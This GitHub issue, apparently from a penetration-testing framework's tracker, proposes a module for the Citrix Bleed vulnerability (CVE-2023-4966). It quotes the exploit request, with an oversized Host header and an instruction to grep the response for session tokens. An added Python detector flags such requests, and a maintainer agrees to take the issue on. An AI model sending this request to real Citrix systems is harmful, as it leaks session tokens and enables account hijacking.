CVE-2023-4966 --- Citrix Bleed: authentication bypass #18486

Closed
jvoisin opened this issue Oct 25, 2023 · 1 comment · Fixed by #18492
@jvoisin
Contributor

jvoisin commented Oct 25, 2023

https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966

tl;dr:

```
GET /oauth/idp/.well-known/openid-configuration HTTP/1.1
Host: A <repeated 24812 times>
Connection: close
```

and grep for session tokens.

jvoisin added the suggestion-module (New module suggestions) label Oct 25, 2023
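
A defensive check for the request shape in the tl;dr above, as an added example that is not part of the original issue or the project's code: it parses raw HTTP requests (for instance, as captured at a reverse proxy) and flags any whose Host header is abnormally long. The 300-byte limit, the function names and the sample requests are assumptions constructed for illustration.

```python
WATCHED_PATH = "/oauth/idp/.well-known/openid-configuration"  # path from the issue
# Assumption: DNS names max out at 253 characters, so 300 is a generous ceiling.
MAX_HOST_LEN = 300


def parse_request(raw: bytes):
    """Return (method, path, [Host values]) or None if the request line is malformed."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3:
        return None
    method = parts[0].decode("latin-1")
    # Drop the query string so "?x=1" cannot hide the watched path.
    path = parts[1].decode("latin-1").split("?", 1)[0]
    hosts = []
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"host":  # header names are case-insensitive
            hosts.append(value.strip())
    return method, path, hosts


def scan(requests, max_host_len=MAX_HOST_LEN):
    """Return one finding per request carrying an oversized Host header."""
    findings = []
    for index, raw in enumerate(requests):
        parsed = parse_request(raw)
        if parsed is None:
            continue
        method, path, hosts = parsed
        longest = max((len(h) for h in hosts), default=0)
        if longest > max_host_len:
            findings.append({"index": index, "method": method, "path": path,
                             "host_len": longest,
                             "watched_path": path.lower() == WATCHED_PATH})
    return findings


# Constructed sample requests (not captured from any real system).
SAMPLES = [
    b"GET /oauth/idp/.well-known/openid-configuration HTTP/1.1\r\n"
    b"Host: gateway.example.test\r\nConnection: close\r\n\r\n",
    b"GET /oauth/idp/.well-known/openid-configuration?x=1 HTTP/1.1\r\n"
    b"hOsT: " + b"A" * 24812 + b"\r\nConnection: close\r\n\r\n",
    b"GET /index.html HTTP/1.1\r\nHost: " + b"B" * 5000 + b"\r\n\r\n",
]

if __name__ == "__main__":
    print(scan(SAMPLES))
```

A finding with `watched_path` set to true matches both the path and the oversized Host header from the issue; oversized Host headers on other paths are still reported, with the flag set to false.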
@smcintyre-r7
Contributor

Yeah, I'll bite on this one.
